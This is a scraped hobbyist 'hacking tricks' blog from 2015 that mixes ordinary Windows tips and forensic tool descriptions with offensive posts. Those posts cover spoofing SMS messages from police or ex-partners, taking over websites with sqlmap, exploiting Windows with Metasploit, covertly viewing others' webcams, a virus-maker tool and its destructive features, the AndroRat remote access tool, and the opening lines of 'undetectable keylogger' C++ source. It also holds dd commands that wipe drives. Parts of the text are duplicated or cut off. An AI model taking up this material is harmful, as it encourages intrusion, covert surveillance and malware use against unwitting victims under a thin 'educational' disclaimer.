Frnds my name is Baru.I wanna give you best trick and tips from prefect hacker's s all tips for only educational base not for crime.if any problem about it so plz comment......... .
Monday, 21 December 2015
How to View Shared Folders with Computer Management
On the left side of the Computer Management there is a panel with lots of sections. Go to "System Tools -> Shared Folders -> Shares".
how to View Your Shared Folders in File Explorer - Windows 8
Open File Explorer and go to the Network section. There, double click or tap your computer's name.
View of Shared Folders in Windows Explorer - Windows 7
The simplest method for viewing all the files you have shared is to open Windows Explorer, click Network and then the name of your computer. You will see a list with all the folders shared by your computer with the network.
Stop automatic Driver updates windows10
turn off or Disable Automatic App Updates in Windows 8.1
You will be required to log in to your Windows PC with your Microsoft Account. This is a must as some services like this one depend on the Microsoft Account. Once this condition is met, openWindows Store by clicking on its Tile on your Start Screen. Next open the Charms Bar and click on Settings. Now click on App updates.
Here you will see the setting: Automatically update my apps.
It will be enabled by default. If you wish to turn off or disable autom
Sunday, 20 December 2015
Block unwanted Windows Updates in Windows 10
Once you have downloaded the standalone package from Microsoft, run it.
Click on Next to proceed.
The Show or Hide Updates tool will scan your system for updates.
Maximize Or Close The Window
This is actually quite a common mouse trick but I find it worth adding in my list of useful mouse tricks. If you want to close a Window just double-click on the Windows Logo on top left corner of your Window.
To maximize or restore the Window, double-click your mouse on the title bar.
windows 10 Select Vertical Text Using [ALT] Key
it is very funny tricks for you.
so are you ready?
Do you know how to select the text vertically? It’s very easy, just press and hold the [ALT] key and select the text using left button of your mouse.
I must mention here that this trick too doesn’t work on online pages. You can use this trick too only on your Microsoft Office documents only.
Mouse Tricks For Windows
I am going to tell you about some of the mouse tricks which I often use, to make life on the computer much easier.
WINDOWS10 Create a folder without any icon
HERE we will learn how to create a folder without any icon. We will see how it is done in Windows 10, but the procedure is the same in earlier Windows versions
WINDOWS10 Basic Notepad Tips and Tricks for Windows users
The humble Notepad in Windows is one of the most used programs. It is a very basic text editoryou can use for simple documents. Let us have a look at some notepad tips and tricks.
Notepad Tips and Tricks
Monday, 14 December 2015
Hack Mobile Number.
Welcome,This is my First post about mobile hacking,In this post,We are going to create any mobile number (police,fire department,ex-girlfriends,etc) and send messages,Sure this method has only 75% success rate,but it works like a charm for the most time.In spoofing attack the attacker (you) make himself a source or desire address.This post is only for education purposes,and this trick
can be traced back to the source very easily,So don't create a scene.
So What Do WE Need :
#SET-Social Engineering Toolkit, Available On Backtrack.
#Brain-To Sense what is wrong and what is right,And to follow this procedure.
how to hack website by sqlmap and backtrack.
In this tutorial, we will learn how to Find a vulnerable Link in a website, Exploit that link by SQL Injection and taking total control over any website,This includes access to usernames and passwords database,
What Do We Need For This Attack ?
# Backtrack 5 (Would work On Windows Too,Just find a sql injecting software)
# SQLMAP - Automatic SQL injection and database takeover tool (Included in Backtrack)
# Internet Access
Windows 7 with Metasploit using Kali Linux
Today i am gonna show how to exploit any windows OS using metasploit.
Exploiting a windows vulnerability to logging into the system with out
username and password using Metasploit.
Before Hacking, you want to know about metasploit framework. If your are new one to hacking, its less possible to know about Metasploit.
Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Before Hacking, you want to know about metasploit framework. If your are new one to hacking, its less possible to know about Metasploit.
Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Friday, 11 December 2015
Xirrus Wi-Fi Inspector
Xirrus Wi-Fi Inspector
Xirrus Wi-Fi Inspector can be used to search for Wi-Fi networks, manage and troubleshoot connections, verify Wi-Fi coverage,WirelessNetView
WirelessNetView is a lightweight utility (available as a standalone executable or installation package) that monitors the activity of reachable wireless networks and displays information related to them, such as SSID, Signal Quality, MAC Address,Advanced IP Scanner
Advanced IP Scanner is a fast and easy to use network scanner that detects any network devices (including wireless devices such as mobile phones, printers and WIFI routers) on your network. It allows you to connect to common services such as HTTP, FTP and shared folders if they are enabled on the remote machine. You are also able to wake up and shut down remote computers.
P2 eXplorer Free
P2 eXplorer Free
P2 eXplorer is a forensic image mounting tool that allows you to mount a forensic image as a physical diskComputer Forensics HELIX3 Free
HELIX3 is a Live CD based on Linux that was built to be used in Incident Response, Computer Forensics and E-Discovery forensic PlainSight
PlainSight is a Live CD based on Knoppix (a Linux distribution) that allows you to perform digital forensicDigital Forensic Framework
Digital Forensic Framework
The Digital Forensics Framework (DFF) is a digital forensic investigation tool and a development platform that allows you to collect, preserve and reveal digital evidence.LastActivityView
I briefly touched on LastActivityView when pointing out the NirSoft suite of tools in my Top 10 Free System Troubleshooting Tools for SysAdmins article.Network Forensic Analysis Tool
Xplico is an open source Network Forensic Analysis Tool (NFAT) that
aims to extract applications data from internet traffic
(e.g. Xplico can extract an e-mail message from POP, IMAP or SMTP traffic). Features include support for a multitude of protocols (e.g. HTTP, SIP, IMAP, TCP, UDP), TCP reassembly, and the ability to output data to a MySQL or SQLite database, amongst others.
Once you’ve installed Xplico, access the web interface by navigating
to http://<IPADDRESS>:9876 and logging in with a normal user
account. The first thing you need to do is create a case and add a new
session. When you create a new session you can either load a PCAP file
(acquired from Wireshark for example) or start a live capture. Once the
session has finished decoding, use the navigation menu on the left hand
side to view the results.
(e.g. Xplico can extract an e-mail message from POP, IMAP or SMTP traffic). Features include support for a multitude of protocols (e.g. HTTP, SIP, IMAP, TCP, UDP), TCP reassembly, and the ability to output data to a MySQL or SQLite database, amongst others.
12 Xplico
10 Bulk Extractor
10 Bulk Extractor
bulk_extractor is a computer forensics tool that scans a disk image, file, or directory of files and extractsinformation such as credit card numbers, domains, e-mail addresses, URLs, and ZIP files. The extracted information is output to a series of text files (which can be reviewed manually or analysed using other forensics tools or scripts).
Tip: Within the output text files you will find entries for data that resemble a credit card number, e-mail address, domain name, etc. You will also see a decimal value in the first column of the text file that, when converted to hex, can be used as the pointer on disk where the entry was found (i.e. if you were analysing the disk manually using a hex editor for example, you would jump to this hexadecimal value to view the data).
Oxygen Forensic Suite 2013 Standard
If you are investigating a case that requires you to gather evidence
from a mobile phone to support your case, Oxygen Forensics Suite
(Standard Edition) is a tool that will help you achieve this. Features
include the ability to gather Device Information (Manufacturer, OS
Platform, IMEI, Serial Number, etc.), Contacts, Messages (Emails, SMS,
MMS, etc.) and recovery of deleted messages, Call Logs, and Calendar and
Task information. It also comes with a file browser which allows you to
access and analyse user photos, videos, documents and device databases.
CAINE (Computer Aided INvestigative Environment)
CAINE (Computer Aided INvestigative Environment) is Linux Live CD that contains a wealth of digital forensic tools. Features include a user-friendly GUI, semi-automated report creation and tools for Mobile Forensics, Network Forensics, Data Recovery and more.Linux ‘dd’
dd comes by default on the majority of Linux distributions available
today (e.g. Ubuntu, Fedora). This tool can be used for various digital
forensic tasks such as forensically wiping a drive (zero-ing out a
drive) and creating a raw image of a drive.
Note: dd is a very powerful tool that can have devastating effects if not used with care. It is recommended that you experiment in a safe environment before using this tool in the real world.
Tip: A modified version of dd is available from – dc3dd includes additional features that were added specifically for digital forensic acquisition tasks.
To use dd, simply open a terminal window and type dd followed by a set of command parameters (which command parameters will obviously depend on what you want to do). The basic dd syntax for forensically wiping a drive is:
dd if=/dev/zero of=/dev/sdb1 bs=1024
where if = input file, of = output file, bs = byte size
Note: Replace /dev/sdb1 with the drive name of the drive you want to forensically wipe and 1024 with the size of the byte blocks you want to write out.
The basic dd syntax for creating a forensic image of a drive is:
dd if=/dev/sdb1 of=/home/andrew/newimage.dd bs=512 conv=noerror,sync
where if = input file (or in this case drive), of = output file, bs = byte size, conv = conversion options
Tip: For additional usage info, from a terminal window, type “man dd” without quotes to bring up the help manual for the dd command.
Note: dd is a very powerful tool that can have devastating effects if not used with care. It is recommended that you experiment in a safe environment before using this tool in the real world.
Tip: A modified version of dd is available from – dc3dd includes additional features that were added specifically for digital forensic acquisition tasks.
To use dd, simply open a terminal window and type dd followed by a set of command parameters (which command parameters will obviously depend on what you want to do). The basic dd syntax for forensically wiping a drive is:
dd if=/dev/zero of=/dev/sdb1 bs=1024
where if = input file, of = output file, bs = byte size
Note: Replace /dev/sdb1 with the drive name of the drive you want to forensically wipe and 1024 with the size of the byte blocks you want to write out.
The basic dd syntax for creating a forensic image of a drive is:
dd if=/dev/sdb1 of=/home/andrew/newimage.dd bs=512 conv=noerror,sync
where if = input file (or in this case drive), of = output file, bs = byte size, conv = conversion options
Tip: For additional usage info, from a terminal window, type “man dd” without quotes to bring up the help manual for the dd command.
downloade here FTK Imager
Note: There is a portable version of FTK Imager that will allow you to run it from a USB disk.
SANS Investigative Forensic Toolkit
click here SANS SIFT
The SANS Investigative Forensic Toolkit (SIFT) is an Ubuntu based Live CD which includes all the tools you need to conduct an in-depth forensic or incident response investigation. It supports analysis of Expert Witness Format (E01), Advanced Forensic Format (AFF), and RAW (dd) evidence formats. SIFT includes tools such as log2timeline for generating a timeline from system logs, Scalpel for data file carving, Rifiuti for examining the recycle bin, and lots more.Wednesday, 9 December 2015
This trick is used to hack WEBCAM of Yahoo messenger. You can view the other persons on their Yahoo WEBCAM without their knowledge, who always keep denying your CAM request.The only drawback of this trick is,you need physical access to the target computer(to store a files in target computer) whose CAM you want to hack.
What is Steganography?
Steganography is a way or lets say technique of encoding hidden messages
in such a way that no one, apart from the sender and intended
recipient, suspects the existence of the message.
In this post,I have presented the software name Our Secret, which hide your private data in the other file.
The webcam looker turns your computer into a comprehensive powerful
video security system to keep an eye on your home,business,school,etc
where webcams or cctvs and other video capturing devices are available.
Webcam looker is a Surveillance software which provides you the features
to capture images and videos from analogue or digital cameras.
Webcam looker supports various numbers of video making devices(ie video sources).You can checkout images and videos from all cameras by simultaneously changing the cameras from main application window.
Webcam looker has a highly optimized motion detection feature available in it.
As soon as the motion is detected in monitoring area,the program generates an alert so that you get alert.
Webcam Looker video surveillance software allows you to choose any 12 of alerting actions like sending email with attached image to your registered email address,short messaging service(sms),Skype,archiving and then saving video and snapshots to your system,sound an alert alarm,upload captured images to the Internet via FTP or HTTP and much more.
Click To Download WEBCAMCOOKER.
Webcam looker supports various numbers of video making devices(ie video sources).You can checkout images and videos from all cameras by simultaneously changing the cameras from main application window.
Webcam looker has a highly optimized motion detection feature available in it.
As soon as the motion is detected in monitoring area,the program generates an alert so that you get alert.
Webcam Looker video surveillance software allows you to choose any 12 of alerting actions like sending email with attached image to your registered email address,short messaging service(sms),Skype,archiving and then saving video and snapshots to your system,sound an alert alarm,upload captured images to the Internet via FTP or HTTP and much more.
Click To Download WEBCAMCOOKER.
stealth program
What is Computer Virus?
A computer virus is a stealth program that
is injected into your computer without your knowledge and runs against
your wishes and frustrate you some time. Viruses can also replicate
themselves. All computer viruses are man-made.A virus can replicates
itself by being copied or initiating its copying to another program,
computer boot sector or files,etc.Some viruses are also used to get
useful information of users like credit card details,email-id
this post i am sharing "Deadlines Virus Maker" with you all.This
software will help you out to make some computer viruses easily.
Features Deadlines Virus Maker:
- Show message box at Windows Start-up.
- Can be added to Start-up.
- Close Widows Live Messenger.
- Close Skype.
- Close Yahoo Messenger.
- Random things happens to computer.
- Infinite Beeping.
- Infinite Message Boxes.
- Disconnect from the Internet.
- Disable Firewall.
- Disable Browser(Chrome,Firefox & IE).
- Open Random files.
- Force Shutdown.
- Disable Task Manager.
- Disable Command Prompt.
- Disable Reg-edit.
- Disable Windows Explorer.
- Randomly Move Mouse.
- Press Keyboard keys Randomly.
- Slow Computer.
- Force Restart.
- Crazy CD Drive.
- Disable Mouse.
- Delete Clipboard Text.
- Kill every process.
- Disable Calculator.
- Disable Notepad.
- File Pumper.
- File Binder.
- Extension Spoofer.
- Visit random URL at random time.
Prevent v1.0
Prevent cut, paste, copy, delete, re-naming of files & folders using this cool application Prevent v1.0
Prevent v1.0
is a freeware application which runs on all Windows Operating System.
The installer in downloading package when run will only places the Prevent 1.0 folder in the system Program Files
Sometimes you don't want that anyone won't cut,copy,past,delete or rename your files or folder's in your computer,for this Prevent v1.0
is a perfect freeware application as no one will ever know what wrong
with your computer while they try to cut,copy,past,delete or rename your
files or folder's on your computer.
If you don't want anyone deleting or renaming or messing around with you data, then Prevent may be able to help you alot.
The downloading package contains following files:
- Prevent Setup.
- Read Me file.
- Uninstall.
Prevent can perform the following operations :
1. Stops Cut.
2. Stops Paste.
3. Stops Copy.
4. Stops Delete.
5. Stops Copy To.
6. Stops Move to.
7. Stops Send To.
8. Prevents renaming.
9. Disables Task Manager-End Process button. Also it doesn't allow you
to right click on process name and click on end process.It also grays
out the context menu item or stops the process.
NOTE:To uninstall or remove Prevent, use the Uninstaller situated in the Prevent folder or simply delete its Program folder.
android rat
AndroRat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
The name AndroRat is a mix of Android and RAT (Remote Access Tool).
The goal of the application is to give the control of the android system remotely and retrieve information from it.
Tuesday, 8 December 2015
Undetectable Keylogger Code in C++ :
Things Required :
-Download and Install Dev-cpp Compiler.You can download file Form Here.
-Basic Knowledge of DOS and C++
Following is Source Code For Keylogger:
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#define BUFSIZE 80
int test_key(void);
int create_key(char *);
int get_keys(void);
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